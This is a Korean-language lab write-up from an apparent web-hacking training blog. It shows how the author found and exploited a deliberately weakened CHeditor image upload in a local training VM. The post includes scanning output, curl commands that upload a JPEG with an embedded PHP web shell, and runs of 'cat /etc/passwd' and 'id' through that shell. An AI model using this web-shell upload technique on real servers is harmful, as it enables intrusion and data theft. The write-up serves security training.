홈페이지 취약점 분석 이야기 | 파일 지도 사진 깨알 |
---|
>> 목록보이기 WH-WebEditor-CH 웹해킹훈련장 라이브 ISO: CH 웹에디터에서의 이미지 검증 취약점WH-WebEditor-CH 훈련장은 cheditor라는 상용 웹 에디터 관련 취약점 훈련장이다. 상용임에도 불구하고 국내에서는 비교적 많이 사용되고 있다. 원래 CHeditor가 배포하는 PHP는 보안상 안전하다. 그런데 JSP, ASP 등으로 번역(?)되는 과정에서 보안 취약점이 발생하는 대표적인 사례중의 하나이기도 하다. 라이브 ISO 파일은 다음에서 내려받을 수 있다.
로그인 후 확인한 IP 주소는 root@kali:~# nmap -A 192.168.189.238 Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-30 14:36 KST Nmap scan report for 192.168.189.238 Host is up (0.00072s latency). Not shown: 999 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.16 ((Unix) OpenSSL/1.0.2j PHP/5.5.13) |_http-server-header: Apache/2.4.16 (Unix) OpenSSL/1.0.2j PHP/5.5.13 |_http-title: CHeditor \xEC\x82\xAC\xEC\xA7\x84 \xEC\xB0\xBD\xEA\xB3\xA0 ::: \xEC\x9B\xB9\xED\x95\xB4\xED\x82\xB9/\xED\x99\x88\xED\x8E\x98\xEC\x9D\xB4\xEC\xA7\x80\xEC\xB7\xA8\xEC\x95\xBD\xEC\xA0\x90\xEC\xA0\x90\xEA\xB2\x80 MAC Address: 00:0C:29:E3:3F:16 (VMware) Device type: general purpose Running: Linux 2.6.X|3.X OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 OS details: Linux 2.6.32 - 3.10 Network Distance: 1 hop TRACEROUTE HOP RTT ADDRESS 1 0.72 ms 192.168.189.238 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.62 seconds root@kali:~#
root@kali:~# nikto -host 192.168.189.238 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.189.238 + Target Hostname: 192.168.189.238 + Target Port: 80 + Start Time: 2017-01-30 14:37:30 (GMT9) --------------------------------------------------------------------------- + Server: Apache/2.4.16 (Unix) OpenSSL/1.0.2j PHP/5.5.13 + The anti-clickjacking X-Frame-Options header is not present. + No CGI Directories found (use '-C all' to force check all possible dirs) + PHP/5.5.13 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current. + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + 7535 requests: 0 error(s) and 3 item(s) reported on remote host + End Time: 2017-01-30 14:37:41 (GMT9) (11 seconds) --------------------------------------------------------------------------- + 1 host(s) tested root@kali:~#
OWASP-ZAP의 스캔 결과에도 별다른 취약점이 없다. WH-WebEditor-CH 누리집에서 찾을 수 있는 URL은 다음과 같다.
위 그림은 Google에서
WH-WebEditor-CH 훈련장에도 이러한 디렉토리나 이미지 업로드 기능이 있는 지 파악한다.
버전별로 다를 수 있다. 다른 몇 군데 누리집을 계속 탐색한다.
예제 페이지에 접근하여 이미지를 업로드하였다.
그런데 OWASP-ZAP의 프록시(history)에서 이미지를 업로드하는 POST 방식의 URL을 찾을 수 없다. 이는 FireFox가 아니라 다른 경로를 통해서 이미지를 업로드한다는 의미이다. 주로 웹에서는 플래쉬(flash)가 담당하기도 한다.
FireFox는 환경설정(Preferences)에서 네트워크 프록시를 변경할 수 있다.
그러나 위에서 사용한 플래쉬는 별도의 프록시 구성을 할 수 없으므로 시스템 전체의 네트워크 프록시를 설정하거나
(
보다 간단한 방법은 현재부터 실행하는 모든 자식프로세스(child process)를 프록시를 사용하도록 강제하는 방법이다.
root@kali:~# export http_proxy=http://127.0.0.1:8080/ root@kali:~# firefox & root@kali:~# 위에서 구동한 파이어폭스로 다시 예제 페이지를 접근해서 이미지를 업로드한다.
OWASP-ZAP에서 예제 페이지의 이미지 업로드 기능을 확인할 수 있다.
이 과정의 대안으로는 MS Windows의 인터넷 옵션을 사용할 수 있다. 윈도우에 OWASP-ZAP을 설치하고 인터넷 옵션의 프록시를 zaproxy로 설정하면 모든 HTTP 응답/요청을 zaproxy에서 확인이 가능하다. WH-WebEditor-CH 훈련장에서 다음 URL이 존재하는 지 확인한다.
위의 두 URL이 존재하면 구글 검색에서 찾은 것과 동일한 방식으로 이미지를 업로드할 수 있을 것이다. root@kali:~# curl -I http://192.168.189.238/cheditor/popup/flash/CHXImage.swf HTTP/1.1 200 OK Date: Mon, 30 Jan 2017 06:41:58 GMT Server: Apache/2.4.16 (Unix) OpenSSL/1.0.2j PHP/5.5.13 X-XSS-Protection: 1 X-Content-Type-Options: nosniff Last-Modified: Mon, 26 Nov 2012 15:00:40 GMT ETag: "31926-4cf6732573600" Accept-Ranges: bytes Content-Length: 203046 Content-Type: application/x-shockwave-flash root@kali:~#
root@kali:~# curl -I http://192.168.189.238/cheditor/imageUpload/upload.php HTTP/1.1 200 OK Date: Mon, 30 Jan 2017 06:42:30 GMT Server: Apache/2.4.16 (Unix) OpenSSL/1.0.2j PHP/5.5.13 X-XSS-Protection: 1 X-Content-Type-Options: nosniff Content-Type: text/html root@kali:~#
POST의 URL만을 WH-WebEditor-CH 훈련장으로 변경하였다.
서버의 응답에 이미지가 올라간 것을 확인할 수 있다.
파이어폭스로 해당 이미지를 접근하면 실제 이미지가 업로드된 것을 확인할 수 있다.
예제 페이지가 없었지만 이미지 업로드 기능(
OWASP-ZAP의
WH-WebEditor-CH 훈련장에서는 Cheditor의 확장자 검증기능을 고의로 삭제하였다.
따라서 이 취약점은
root@kali:~# curl "http://192.168.189.238/cheditor/attach//LeQiXuxmKhArQtfG1d8v3Y1A7jC.php?1=system&2=cat+/etc/passwd" 2> /dev/null | grep -a -A 100 "<pre>" <pre>root:x:0:0:Root Administrator:/root:/bin/sh nobody:x:99:99:Unprivileged User:/dev/null:/bin/false www:x:80:80:Web Server User:/var/www:/bin/false tux:x:1000:1000:Linux User,,,:/home/tux:/bin/sh root@kali:~#
다음은 root@kali:~# ls -als xmm.jpg.php 4 -rw-rw-r-- 1 root root 985 1월 22 21:27 xmm.jpg.php root@kali:~# identify xmm.jpg.php xmm.jpg.php JPEG 41x29 41x29+0+0 8-bit sRGB 985B 0.000u 0:00.000 root@kali:~# tail -1 xmm.jpg.php <pre><?php system($_GET[1]) ?> root@kali:~# root@kali:~# curl -F "Filename=test.php" -F "filesize=985" -F "file=@xmm.jpg.php;type=application/octet-stream" -F "Upload=Submit Query" http://192.168.189.238/cheditor/imageUpload/upload.php -v * Trying 192.168.189.238... * Connected to 192.168.189.238 (192.168.189.238) port 80 (#0) > POST /cheditor/imageUpload/upload.php HTTP/1.1 > Host: 192.168.189.238 > User-Agent: curl/7.47.0 > Accept: */* > Content-Length: 1500 > Expect: 100-continue > Content-Type: multipart/form-data; boundary=------------------------09a07e3db39ff072 > < HTTP/1.1 100 Continue < HTTP/1.1 200 OK < Date: Mon, 30 Jan 2017 11:03:00 GMT < Server: Apache/2.4.16 (Unix) OpenSSL/1.0.2j PHP/5.5.13 < X-XSS-Protection: 1 < X-Content-Type-Options: nosniff < Content-Length: 187 < Content-Type: text/html < * Connection #0 to host 192.168.189.238 left intact { fileUrl: 'http://192.168.189.238/cheditor/attach//O4UFqOKT.php', filePath: '/var/www/cheditor/attach//O4UFqOKT.php', origName: 'xmm.jpg.php', fileName: 'O4UFqOKT.php', fileSize: '985' }root@kali:~# root@kali:~# curl http://192.168.189.238/cheditor/attach//O4UFqOKT.php?1=id 2> /dev/null | grep -a "<pre>" <pre>uid=80(www) gid=80(www) groups=80(www) root@kali:~# [처음 작성한 날: 2017.01.30] [마지막으로 고친 날: 2017.02.07] < 이전 글 : 단순한 방어법(../ 제거)의 파일 다운로드 취약점 진단 사례 (2017.03.29) > 다음 글 : 오늘의 웹서버 공격 로그: MySQL 관리 인터페이스 자동탐색 도구 - Jorgee Scanner (2017.01.25) 이 저작물은 크리에이티브 커먼즈 저작자표시 4.0 국제 라이선스에 따라 이용할 수 있습니다. 잘못된 내용, 오탈자 및 기타 문의사항은 j1n5uk{at}daum.net으로 연락주시기 바랍니다. 문서의 시작으로 컴퓨터 깨알지식 웹핵 누리집 대문 |